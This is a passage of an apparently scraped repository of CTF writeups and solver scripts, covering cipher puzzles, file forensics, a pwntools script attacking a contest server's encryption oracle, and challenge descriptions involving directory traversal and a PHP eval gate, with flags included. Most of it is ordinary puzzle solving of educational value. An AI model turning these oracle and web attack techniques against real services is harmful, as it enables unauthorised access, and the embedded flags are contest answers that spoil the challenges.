least v2.0 to extract, uncompressed size: 367, name: __MACOSX/._GeraldFlag.png\n391327 0x5F89F End of Zip archive, footer length: 22\n392072 0x5FB88 Zlib compressed data, 
\n\nIf we take `-Y` to mean Caps Lock is on and `-N` to mean it is off, upper and lower case become distinguishable.\n\n```\nVkrxog_lW_Kdyh_EhhQ_Yljhqhuh_Lqvwhdg\n```\n\nTrying ROT shifts on this, ROT23 produced readable English.\n\n```\nShould_iT_Have_BeeN_Vigenere_Instead\n```\n\nThe solver is as follows.\n\n```py\nimport string\n\nUPPER = string.ascii_uppercase * 2\n\nl = open('text.txt','r').read().replace('\\n','').split(', ')\n\nplain = ''\nfor s in l:\n    ss = s.split('-')\n    c = chr(int(ss[0],8))\n    if(len(ss) == 2):\n        c = UPPER[UPPER.find(c) + 23] # ROT23\n        if(ss[1] == 'Y'):\n            plain += c\n        else:\n            plain += c.lower()\n    else:\n        plain += c\n\nprint(plain)\n```\n\n<!-- bcactf{Should_iT_Have_BeeN_Vigenere_Instead} -->\n" }, { "alpha_fraction": 0.5040816068649292, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 32.75862121582031, "blob_id": "35113c1ced09adf5cf0ac78ae1fb3f8c86cf2425", "content_id": "4cf10d9239cbe5ed32d40f93f9aeb164f76eee60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1106, "license_type": "no_license", "max_line_length": 129, "num_lines": 29, "path": "/2021/BCACTF_2.0/Geralds_New_Job/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nWe are given a PDF file.\n\nInspecting it with `binwalk` shows that a PNG file is embedded, so we extract it.\n\n```bash\n$ binwalk gerald.pdf\n\nDECIMAL HEXADECIMAL DESCRIPTION\n--------------------------------------------------------------------------------\n0 0x0 PDF document, version: \"1.3\"\n66 0x42 Zip archive data, at least v2.0 to extract, uncompressed size: 441011, name: GeraldFlag.png\n390777 0x5F679 Zip archive data, at least v2.0 to extract, uncompressed size: 367, name: __MACOSX/._GeraldFlag.png\n391327 0x5F89F End of Zip archive, footer length: 22\n392072 0x5FB88 Zlib compressed data, default compression\n722826 0xB078A Zlib compressed data, default compression\n723219 0xB0913 End of Zip archive, footer length: 22\n```\n\n```bash\n$ binwalk -e gerald.pdf\n```\n\nThis yields an image file with the flag written on it.\n\n![](./_gerald.pdf.extracted/GeraldFlag.png)\n\n<!-- bcactf{g3ra1d_15_a_ma5ter_p01yg1ot_0769348} -->\n\n" }, { "alpha_fraction": 0.7305555343627930, "alphanum_fraction": 0.7444444298744202, "avg_line_length": 31.727272033691406, "blob_id": "744ea69907ba86ec969efecb9141451dea478d7c", "content_id": "66ce2e1d7247f19c7126e04cdccf452c00171f08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 360, "license_type": "no_license", "max_line_length": 175, "num_lines": 11, "path": "/2021/ImaginaryCTF_2021/Build-A-Website/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "**Description**\n\nI made a website where y'all can create your own websites! Should be considerably secure even though I'm a bit rusty with Flask.\n\n**Attachments**\n\n[https://imaginaryctf.org/r/3ACF-app.py](https://imaginaryctf.org/r/3ACF-app.py) [http://build-a-website.chal.imaginaryctf.org/](http://build-a-website.chal.imaginaryctf.org/)\n\n**Author**\n\nEth007\n" }, { "alpha_fraction": 0.6048064231872559, "alphanum_fraction": 0.6283934116363525, "avg_line_length": 19.243244171142578, "blob_id": "14153b7d3cc470597b0bb83db98cc8c1120e32bf", "content_id": "7039e29ab0fc02806837ddbd75eb4f385d8d6154", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2495, "license_type": "no_license", "max_line_length": 66, "num_lines": 111, "path": "/2021/UIUCTF_2021/back_to_basics/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nWe are given the following program and a ciphertext.\n\n```py\nfrom Crypto.Util.number import long_to_bytes, bytes_to_long\nfrom gmpy2 import mpz, to_binary\n#from secret import flag, key\n\nALPHABET = bytearray(b\"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ#\")\n\ndef base_n_encode(bytes_in, base):\n\treturn mpz(bytes_to_long(bytes_in)).digits(base).upper().encode()\n\ndef base_n_decode(bytes_in, base):\n\tbytes_out = to_binary(mpz(bytes_in, base=base))[:1:-1]\n\treturn bytes_out\n\ndef encrypt(bytes_in, key):\n\tout = bytes_in\n\tfor i in key:\n\t\tout = base_n_encode(out, ALPHABET.index(i))\n\treturn out\n\ndef decrypt(bytes_in, key):\n\tout = bytes_in\n\tfor i in key:\n\t\tout = base_n_decode(out, ALPHABET.index(i))\n\treturn out\n\n\"\"\"\nflag_enc = encrypt(flag, key)\nf = open(\"flag_enc\", \"wb\")\nf.write(flag_enc)\nf.close()\n\"\"\"\n```\n\nFor each key byte, encryption\n\n1. converts the byte string to an integer\n\n * `b'flag' ⇒ 1718378855`\n\n2. writes that integer as a string of base-N digits `(key = b'K')`\n\n * `1718378855 ⇒ b'K0FF0EB' (base 21)`\n\nand repeats these two steps.
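\n\nThe example row can be reproduced with the same gmpy2 call the challenge code uses (base 21, matching the output shown above):\n\n```py\nfrom Crypto.Util.number import bytes_to_long\nfrom gmpy2 import mpz\n\nn = bytes_to_long(b'flag')          # 1718378855\nprint(mpz(n).digits(21).upper())    # K0FF0EB\n```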
\n\nDecryption therefore just reverses the procedure. Since the key is unknown, we try every alphabet byte at each layer and keep whichever one decodes cleanly, checking that the result still looks like a printable base-N string.\n\nRunning the following program recovers the flag.\n\n\n```py\nfrom Crypto.Util.number import long_to_bytes, bytes_to_long\nfrom gmpy2 import mpz, to_binary\n\nALPHABET = bytearray(b\"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ#\")\n\ndef base_n_encode(bytes_in, base):\n\treturn mpz(bytes_to_long(bytes_in)).digits(base).upper().encode()\n\ndef base_n_decode(bytes_in, base):\n\tbytes_out = to_binary(mpz(bytes_in, base=base))[:1:-1]\n\treturn bytes_out\n\ndef encrypt(bytes_in, key):\n\tout = bytes_in\n\tfor i in key:\n\t\tout = base_n_encode(out, ALPHABET.index(i))\n\treturn out\n\ndef decrypt(bytes_in, key):\n\tout = bytes_in\n\tfor i in key:\n\t\tout = base_n_decode(out, ALPHABET.index(i))\n\treturn out\n\n# encrypt\n\"\"\"\nflag_enc = encrypt(flag, key)\nf = open(\"flag_enc\", \"wb\")\nf.write(flag_enc)\nf.close()\n\"\"\"\n\n# decrypt: undo one base-N layer at a time, keeping the candidate byte\n# whose result contains no raw \\x.. escapes in its repr\nflag_enc = open(\"flag_enc\", \"rb\").read()\nkey = b''\nwhile True:\n    for k in ALPHABET:\n        bk = long_to_bytes(k)\n        try:\n            flag_dec = decrypt(flag_enc, bk)\n            if '\\\\x' not in str(flag_dec):\n                key += bk\n                flag_enc = flag_dec\n                break\n        except Exception as e:\n            # invalid digits for this base\n            pass\n    if b'uiuctf' in flag_dec:\n        print(flag_dec)\n        break\n```\n\n<!-- uiuctf{r4DixAL} -->\n" }, { "alpha_fraction": 0.30408161878585815, "alphanum_fraction": 0.4612244963645935, "avg_line_length": 22.33333396911621, "blob_id": "ff95ce1b947b10358b604a0ad98569c42b4506a1", "content_id": "5139978c0ab37e8fd2453300934eacbe8cfe6488", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 490, "license_type": "no_license", "max_line_length": 108, "num_lines": 21, "path": "/2021/RaRCTF_2021/minigen/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import string\n\nCHAR = string.printable\n\nct = [281, 547, 54, 380, 392, 98, 158, 440, 724, 218, 406, 672, 193, 457, 694, 208, 455, 745, 196, 450, 724]\nflag = 'ra' # rarctf{\n\n# Consecutive keystream values have a constant second difference mod 727,\n# so two known plaintext letters pin the generator down\ns, t, u = ct[0]^ord('r'), ct[1]^ord('a'), ct[2]^ord('r')\nd = (t-s)%727\ndiff = ((u-t)%727 - d)\n\nfor idx in range(2,len(ct)):\n    for c in CHAR:\n        u = ct[idx]^ord(c)\n        if d + diff == (u-t)%727:\n            flag += c\n            d = (u-t)%727\n            s = t\n            t = u\n            break\nprint(flag)\n" }, { "alpha_fraction": 0.6872727274894714, "alphanum_fraction": 0.7454545497894287, "avg_line_length": 29.66666603088379, "blob_id": "687e2891a002ab06a9a56601b198ca6c52", "content_id": "723afd7910c1e667455e8f9f43fff048094bcd3e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 347, "license_type": "no_license", "max_line_length": 121, "num_lines": 9, "path": "/2020/WaniCTF/Veni_vidi/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nSince the flag format is `FLAG{[0-9a-zA-Z_\\-$@!?]+}`, we guess that `SYNT{fvzcyr_pynffvpny_pvcure}` is a substitution cipher, with `SYNT` lining up with `FLAG`.\n\nApplying ROT13 yields the flag.\n\n* [CyberChef](https://gchq.github.io/CyberChef/#recipe=ROT13(true,true,13)&input=U1lOVHtmdnpjeXJfcHluZmZ2cG55X3B2Y3VyZX0)
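\n\nThe same check also works offline with Python's built-in `rot_13` codec:\n\n```py\nimport codecs\n\nprint(codecs.decode('SYNT{fvzcyr_pynffvpny_pvcure}', 'rot_13'))\n# FLAG{simple_classical_cipher}\n```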
\n\n<!-- FLAG{simple_classical_cipher} -->" }, { "alpha_fraction": 0.3118543922901154, "alphanum_fraction": 0.4585798680782318, "avg_line_length": 16.095237731933594, "blob_id": "d4e5df6b48af7bde59b26953b68afd28889d945b", "content_id": "b0d8ff63315c5b6b42c65f7fd9e2118b4a076f91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 340, "license_type": "no_license", "max_line_length": 55, "num_lines": 21, "path": "/2021/PlaidCTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# PlaidCTF 2021\n\n* http://plaidctf.com/\n\n* 2021/04/17 06:00 JST — 2021/04/19 06:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| ------ | -------------- | -------- | ----: | -----: |\n| Crypto | [xorsa](xorsa) | RSA, XOR | 100 | 180 |\n\n---\n\n## Result\n\n* 101 points\n\n* 127 / 541 (> 1 pt) " }, { "alpha_fraction": 0.5328185558319092, "alphanum_fraction": 0.5727155804634094, "avg_line_length": 30.230770111083984, "blob_id": "c27dae4e3b2b284b4e937b1b53bdd4269f9b74bc", "content_id": "4e60f7d24ce9ef2a427f25d0f639dd2d44e3f5af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 405, "license_type": "no_license", "max_line_length": 91, "num_lines": 13, "path": "/2021/RITSEC_CTF_2021/Parcel/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import base64\nimport os\nimport re\n\nwith open(os.path.dirname(__file__)+'/Parcel_extract') as f:\n    text = f.read()\n    text = text.replace('\\n','')\n    # 'iVB...' is how base64-encoded PNG data begins; each image runs up to a '-'\n    b64s = re.findall(r'iVB.*?-',text)\n    for index, b in enumerate(b64s):\n        # print(index)\n        img = base64.b64decode(b[0:-1])\n        with open(f\"{os.path.dirname(__file__)}/extract_img/image{index}.png\", 'bw') as fi:\n            fi.write(img)" }, { "alpha_fraction": 0.7973856329917908, "alphanum_fraction": 0.8300653696060181, "avg_line_length": 29.600000381469727, "blob_id": "bf05a1a2b8268bcda00e3fccdfd051fff4997365", "content_id": "281b55a2be0b5521952c225377ff864a82e0869b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 187, "license_type": "no_license", "max_line_length": 113, "num_lines": 5, "path": "/2021/WaniCTF21-spring/illegal_image/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "It seems images are being exchanged behind the scenes\n\n[for-illegal-image.zip](https://score.wanictf.org/storage/tmokrhl2cquaqsvj48syxgpkghq2cc0s/for-illegal-image.zip)\n\nWriter : takushooo\n" }, { "alpha_fraction": 0.8374999761581421, "alphanum_fraction": 0.8374999761581421, "avg_line_length": 24.3157901763916, "blob_id": "6c15e4af9989b4ce5a1cc08aa16b2fbfc3d6a214", "content_id": "395d67520415c2f7341fa965962dba26723c804b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 822, "license_type": "no_license", "max_line_length": 101, "num_lines": 19, "path": "/2020/WaniCTF/Simple_Memo/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Challenge page: https://simple.wanictf.org/\n\nI hid my secret in a file called flag.txt, but I sanitized everything perfectly, so there is no way you can reach it.\n\n(Hint) The vulnerability is a directory traversal.\n\nTo find out what is being sanitized, refer to the source code (reader.php).\n\n(Note)\n\nsimple_memo.zip is not required to solve the challenge; it is provided so you can reproduce the challenge environment locally with docker-compose.\n\nFeel free to use it if you are interested.\n\n[reader.php](https://score.wanictf.org/storage/tnlvzxmhsbfbgnfkjnzdryggsohweoov/reader.php)\n\n[simple_memo.zip](https://score.wanictf.org/storage/ufftwmlenojlxqigeldldmbmeeocseiq/simple_memo.zip)\n\nWriter : okmt" }, { "alpha_fraction": 0.31185439229011536, "alphanum_fraction": 0.3713723421096802, "avg_line_length": 60.60606002807617, "blob_id": "b93ded0af3153cf2f3c8efcd61a8aee788f3abc2", "content_id": "f08da4fa9330384a71b9172dba8a2da03537b17a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2035, "license_type": "no_license", "max_line_length": 123, "num_lines": 
33, "path": "/2021/dCTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# DCTF 2021\n\n* http://dctf.dragonsec.si/\n\n* 2021/05/15 00:00 JST — 2021/05/17 06:59 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ---------------------------------------------------------------- | ----------------------- | ----: | -----: |\n| Misc | [Bad Apple](Bad_Apple) | Audacity, QR code | 200 | 159 |\n| Reversing | [Bell](Bell) | Ghidra | 100 | 218 |\n| Misc | [Don't let it run](Dont_let_it_run) | strings | 100 | 328 |\n| Misc | [Dragon](Dragon) | image forensics | 100 | 394 |\n| Misc | [Encrypted the flag I have](Encrypted_the_flag_I_have) | font, Gonk Droid Medium | 100 | 352 |\n| Misc | [Extraterrestrial Communication](Extraterrestrial_Communication) | SSTV | 200 | 166 |\n| Misc | [Hidden message](Hidden_message) | image, embed data | 100 | 345 |\n| Crypto | [Julius' ancient script](Julius_ancient_script) | ROT | 100 | 352 |\n| Crypto | [Just Take Your Time](Just_Take_Your_Time) | DES3, fixed iv | 200 | 135 |\n| Misc | [Leak Spin](Leak_Spin) | OSINT? | 100 | 298 |\n| Web | [Simple web](Simple_web) | DevTools | 100 | 864 |\n| Crypto | [This one is really basic](This_one_is_really_basic) | Base64 | 300 | 242 |\n| Web | [Very secure website](Very_secure_website) | PHP, magic hash | 200 | 399 |\n\n---\n\n## Result\n\n* 1950 points\n\n* 189 / 1084 (> 1 pt)\n" }, { "alpha_fraction": 0.6756756901741028, "alphanum_fraction": 0.7550675868988037, "avg_line_length": 33.882354736328125, "blob_id": "d4f6a18b3c708301902028e0d9556311d4efba83", "content_id": "96b8d326f2a5408cb036f241addf67f5831b140e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 718, "license_type": "no_license", "max_line_length": 218, "num_lines": 17, "path": "/2021/UMassCTF_2021/notes/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nWe analyze the .mem file with Volatility.\n\nAccording to the hint, the text displayed in Notepad looks suspicious, so we run the following commands to dump and inspect `notepad.exe`.\n\n```bash\n$ vol.py -f image.mem imageinfo\n$ vol.py -f image.mem --kdbg=0xf80002a3b0a0 --profile=Win7SP1x64 pstree\n$ vol.py -f image.mem --kdbg=0xf80002a3b0a0 --profile=Win7SP1x64 memdump -D ./ -p 2696\n$ strings -e l 2696.dmp | grep \"UMASS\"\nUMASS{$3CUR3_$70Rag3}\n```\n\n[Reference]\n\n* [Volatility tips: how to extract text typed in a notepad window from a Windows memory dump](https://www.andreafortuna.org/2018/03/02/volatility-tips-extract-text-typed-in-a-notepad-window-from-a-windows-memory-dump/)" }, { "alpha_fraction": 0.6269350051879883, "alphanum_fraction": 0.6517027616500854, "avg_line_length": 23.846153259277344, "blob_id": "dfc57d11740144d31b9a96fbdd297e47450bf2ec", "content_id": "794de5196885dd5c010aa329ccd681c101171ee8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 646, "license_type": "no_license", "max_line_length": 72, "num_lines": 26, "path": "/2021/BCACTF_2.0/FNES_1/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\ncontext.log_level = 'error'\n\ntarget_query = \"Open sesame... 
Flag please!\"\n\n# 1. Encrypt a run of NUL bytes: the ciphertext we get back is the raw keystream\nio = remote('crypto.bcactf.com', '49153')\nio.recvuntil('Would you like to encrypt (E), decrypt (D), or quit (Q)?')\nio.sendline('E')\nio.recvuntil('>>> ')\nc = '\\x00' * len(target_query)\nio.sendline(c)\nio.recvuntil(\"Here's your message:\\n\")\nmsg = io.recvline().strip().decode('utf-8')\n\n# 2. XOR the keystream with the target query and submit it for decryption\nio = remote('crypto.bcactf.com', '49153')\nio.recvuntil('Would you like to encrypt (E), decrypt (D), or quit (Q)?')\nio.sendline('D')\nio.recvuntil('>>> ')\nc = xor(bytes.fromhex(msg), target_query.encode('utf-8')).hex()\nio.sendline(c)\n\nio.interactive()\n\nio.close()\n" }, { "alpha_fraction": 0.7447747898101807, "alphanum_fraction": 0.7447747898101807, "avg_line_length": 23.5, "blob_id": "b8beff8682197b47007d7a84daf0613d5807c126", "content_id": "0e1febf6b89cda79d92fcabbdf381c5dd0332e1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 98, "license_type": "no_license", "max_line_length": 62, "num_lines": 4, "path": "/2021/HeroCTF_v3/Record/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Can you find anything special about this domain `heroctf.fr` ?\n\nFormat : Hero{}\nAuthor : xanhacks\n" }, { "alpha_fraction": 0.4991273880004883, "alphanum_fraction": 0.6541011929512024, "avg_line_length": 50.16071319580078, "blob_id": "340ab9fe5e149ace713a35dc5ce2ed6ab05cf2a7", "content_id": "98ec5b5b1a292b467549add231e2e73ef5d06e97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3017, "license_type": "no_license", "max_line_length": 1295, "num_lines": 56, "path": "/2021/BCACTF_2.0/Countdown_Timer/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nOpen http://web.bcactf.com:49154/ in a browser.\n\nPressing the [Start Countdown] button starts a countdown.\n\n![](img/2021-06-13-13-16-11.png)\n\nLooking at the page source, we find the following JavaScript.\n\n```js\n<script type=\"text/javascript\">\n    var time = 100000;\n    var minTime = 100;\n    var daysInput = document.getElementById(\"countdownDays\");\n    var counter;\n    document.getElementById(\"startButton\").onclick = function () {\n        startCountDown();\n    };\n    document.getElementById(\"minTimeHeader\").innerHTML = \"Minimum Time: \" + minTime + \" days\";\n\n    daysInput.min = minTime;\n\n    function startCountDown() {\n        clearInterval(counter);\n        if (daysInput.value < minTime) {\n            daysInput.value = minTime;\n        }\n        time = daysInput.value * 24 * 60 * 60;\n        counter = setInterval(countdown, 1000);\n    }\n\n    function countdown() {\n        time -= 1;\n        if (time <= 0) {\n            getFlag();\n            clearInterval(counter);\n            return;\n        }\n        var numdays = Math.floor(time / 86400);\n        var numhours = Math.floor((time % 86400) / 3600);\n        var numminutes = Math.floor(((time % 86400) % 3600) / 60);\n        var numseconds = ((time % 86400) % 3600) % 60;\n        document.getElementById(\"remainingTime\").innerHTML = numdays + \" Days \" + numhours + \" Hours \" + numminutes + \" Minutes \" + numseconds + \" Seconds\";\n    }\n    \n    //This is not part of the intended solve path, ignore this\n    function getFlag() {\n        var _0x2636=['atob','5117oZMdEn','then','VjIxak9WQlJQVDA9','Time\\x20is\\x20up!\\x20Flag:\\x20','text','2myDwax','80990TIAiao','159475uJlWpn','486144SCONMd','1ZGbuyJ','70599pvkkee','getElementById','39313hGSvrt','remainingTime','2ryZPVf','1AonKEy','133880SpkfyF'];function _0x91fe(_0x432e25,_0x1d1f40){_0x432e25=_0x432e25-0x199;var _0x26367c=_0x2636[_0x432e25];return _0x26367c;}var _0x54df47=_0x91fe;(function(_0x5ee5d0,_0x1eb0fc){var 
_0x3fc014=_0x91fe;while(!![]){try{var _0x1bb0d9=parseInt(_0x3fc014(0x1a9))+parseInt(_0x3fc014(0x19d))*parseInt(_0x3fc014(0x19b))+parseInt(_0x3fc014(0x1a6))+parseInt(_0x3fc014(0x19f))*-parseInt(_0x3fc014(0x19c))+-parseInt(_0x3fc014(0x1a8))*-parseInt(_0x3fc014(0x1a5))+-parseInt(_0x3fc014(0x199))*-parseInt(_0x3fc014(0x1a4))+-parseInt(_0x3fc014(0x1a7));if(_0x1bb0d9===_0x1eb0fc)break;else _0x5ee5d0['push'](_0x5ee5d0['shift']());}catch(_0x27a98){_0x5ee5d0['push'](_0x5ee5d0['shift']());}}}(_0x2636,0x2892d),fetch('/'+window['atob'](window[_0x54df47(0x19e)](window[_0x54df47(0x19e)](window['atob'](window['btoa'](window['atob'](_0x54df47(0x1a1))))))))[_0x54df47(0x1a0)](_0x192f21=>_0x192f21[_0x54df47(0x1a3)]())['then'](_0x1b849e=>{var _0xbb5c79=_0x54df47;time<=0x0&&(document[_0xbb5c79(0x1aa)](_0xbb5c79(0x19a))['innerHTML']=_0xbb5c79(0x1a2)+_0x1b849e);}));\n    }\n</script>\n```\n\nTyping `time = 0;` into the DevTools console makes the next timer tick take the `time <= 0` branch, and the flag is displayed.\n\n<!-- bcactf{1_tH1nK_tH3_CtF_w0u1D_b3_0v3r_bY_1O0_dAy5} -->\n" }, { "alpha_fraction": 0.7160493731498718, "alphanum_fraction": 0.7580246925354004, "avg_line_length": 15.199999809265137, "blob_id": "33475995849d6495ba8fd1f4f6df7e7feb863109", "content_id": "70429a2f99bfd19d82c128f3557ca7d566f7d224", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 549, "license_type": "no_license", "max_line_length": 105, "num_lines": 25, "path": "/2021/WaniCTF21-spring/01_netcat/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "```\nnc netcat.pwn.wanictf.org 9001\n```\n\n* You only need the command called netcat (nc).\n\n* Even if nothing is printed after you connect, try typing commands you know.\n\nExample tools\n\n* netcat (nc)\n\ngcc hardening\n\n* Full RELocation ReadOnly (RELRO)\n\n* Stack Smash Protection (SSP) enabled\n\n* No eXecute bit (NX) enabled\n\n* Position Independent Executable (PIE) enabled\n\n[pwn-01-netcat.zip](https://score.wanictf.org/storage/3zjr6y6vpfzfc66zmwxh9nr6b2eoyf6p/pwn-01-netcat.zip)\n\nWriter : saru\n" }, { "alpha_fraction": 0.6518987417221069, "alphanum_fraction": 0.7594936490058899, "avg_line_length": 30.799999237060547, "blob_id": "d9ceea82e21fb22d2716a4e42b3d8b9323c5e93d", "content_id": "ec4f207812bfd99cbeeac82eaf1a12af4422cc4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 158, "license_type": "no_license", "max_line_length": 89, "num_lines": 5, "path": "/2020/kksctf_open_2020/bson/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "This is the last time i'm asking, who the f is bson??\n\n[bson.json](https://tasks.kksctf.ru/tasks/183dd9ea-3d9f-4fd7-815d-b91cd1a57ef4/bson.json)\n\n@anfinogenov" }, { "alpha_fraction": 0.2857142984867096, "alphanum_fraction": 0.46560847759246826, "avg_line_length": 18, "blob_id": "9b4a2a17a81bcfb5c5993f96f2d939e4f396b6dc", "content_id": "7454f88d71600d54186fbc1291834d44e2b68956", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 189, "license_type": "no_license", "max_line_length": 83, "num_lines": 10, "path": "/2020/CyberSecurityRumble2020/Hashfun/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "digest = [10, 30, 31, 62, 27, 9, 4, 0, 1, 1, 4, 4, 7, 13, 8, 12, 21, 28, 12, 6, 60]\nchar = 'CSR{'\n\n# Each digest byte XORs two flag characters four positions apart,\n# so the known prefix 'CSR{' unrolls the whole flag\ni = 0\nfor d in digest:\n    x = chr(d ^ ord(char[i]))\n    char += x\n    i += 1\n\nprint(char)" }, { "alpha_fraction": 0.7948718070983887, "alphanum_fraction": 0.7948718070983887, "avg_line_length": 30.399999618530273, "blob_id": 
"2cd9d69c10c6f3a3b1e37faca570cff7ab70f82a", "content_id": "27c6d4e24bb1bc26e62ff965c663555c8285ea08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 156, "license_type": "no_license", "max_line_length": 86, "num_lines": 5, "path": "/2020/CyberSecurityRumble2020/Hashfun/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I guess there is no way to recover the flag.\n\n[Files](https://storage.googleapis.com/ctf.cybersecurityrumble.de/hashfun/generate.py)\n\nAuthor: rugo|RedRocket" }, { "alpha_fraction": 0.6711409687995911, "alphanum_fraction": 0.7114093899726868, "avg_line_length": 36.5, "blob_id": "ce9eecd36b8b06aaf0f9fc04e48796fea3893cbd", "content_id": "b3097abbddf76a3a93a914cc513baf4e29a101f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 153, "license_type": "no_license", "max_line_length": 88, "num_lines": 4, "path": "/2021/Zh3r0_CTF_V2/bxxs/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "We've made some new epic updates to our website. Could you send us some feedback on it ?\n\n⬇️ link - [bxxs](http://web.zh3r0.cf:3333/)\nAuthor - ZyperX" }, { "alpha_fraction": 0.6009615659713745, "alphanum_fraction": 0.7403846383094788, "avg_line_length": 18, "blob_id": "cc125cc82539ea5ea1ff2f0eb4ced46abb9ddccb", "content_id": "d07271e708df98e36f568a624322e4198f115172", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 208, "license_type": "no_license", "max_line_length": 45, "num_lines": 11, "path": "/2021/UMassCTF_2021/ekrpat/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I made so few errors when creating this jail.\n\nnc 34.72.64.224 8083\n\nnc 35.231.20.75 8083\n\nCreated by Thomas (Seltzerz #6678)\n\n<details><summary>View Hint</summary>\nLook down at where you're typing.\n</details>" }, { "alpha_fraction": 0.31308412551879883, "alphanum_fraction": 0.44859811663627625, "avg_line_length": 16.83333396911621, "blob_id": "5849f64e6a0649381111a68cd644f06a654688c2", "content_id": "b15766e46d84ea87deaa4bd849a385374e919882", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 430, "license_type": "no_license", "max_line_length": 55, "num_lines": 24, "path": "/2021/WeCTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# WeCTF 2021\n\n* https://21.wectf.io/\n\n * https://github.com/wectf/2021\n\n* 2021/06/20 02:00 JST — 2021/06/21 02:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --- | ------------------ | ------- | ----: | -----: |\n| Web | [CSP 1](CSP_1) | CSP | 335 | 133 |\n| Web | [Include](Include) | LFI | 310 | 395 |\n\n---\n\n## Result\n\n* 664 points\n\n* 147 / 574 (> 1 pt)\n" }, { "alpha_fraction": 0.6096033453941345, "alphanum_fraction": 0.630480170249939, "avg_line_length": 22.950000762939453, "blob_id": "a1488963487302b984bdc8f23a23b9c3b4437130", "content_id": "bdbcdcea6ba783a8462e1d98555034c38074e4e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 595, "license_type": "no_license", "max_line_length": 137, "num_lines": 20, "path": "/2021/UIUCTF_2021/phpfuck/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttp://phpfuck.chal.uiuc.tf 
— open this page in a browser.\n\nIt executes `show_source(__FILE__)` and `phpinfo()`.\n\n```php\n<?php\n// Flag is inside ./flag.php :)\n($x=str_replace(\"`\",\"\",strval($_REQUEST[\"x\"])))&&strlen(count_chars($x,3))<=5?print(eval(\"return $x;\")):show_source(__FILE__)&&phpinfo();\n```\n\n(`count_chars($x,3)` returns the distinct characters of `$x`, so the `eval` gate only admits payloads built from at most five distinct characters — but we do not even need it here.)\n\nSince the comment says there is a `./flag.php`, we open http://phpfuck.chal.uiuc.tf/flag.php and view its source, where the flag is written.\n\n```\n<? /* uiuctf{pl3as3_n0_m0rE_pHpee} */ ?>\nNo flag for you!\n```\n\n<!-- uiuctf{pl3as3_n0_m0rE_pHpee} -->\n" }, { "alpha_fraction": 0.6696428656578064, "alphanum_fraction": 0.7232142686843872, "avg_line_length": 19.18181800842285, "blob_id": "b65fa5309844d47f43ac457952dccf6dae857c52", "content_id": "849e24f1d5db02b30c446b49cbe12badc4e9a7e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 224, "license_type": "no_license", "max_line_length": 119, "num_lines": 11, "path": "/2021/ImaginaryCTF_2021/Formatting/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "**Description**\n\nWait, I 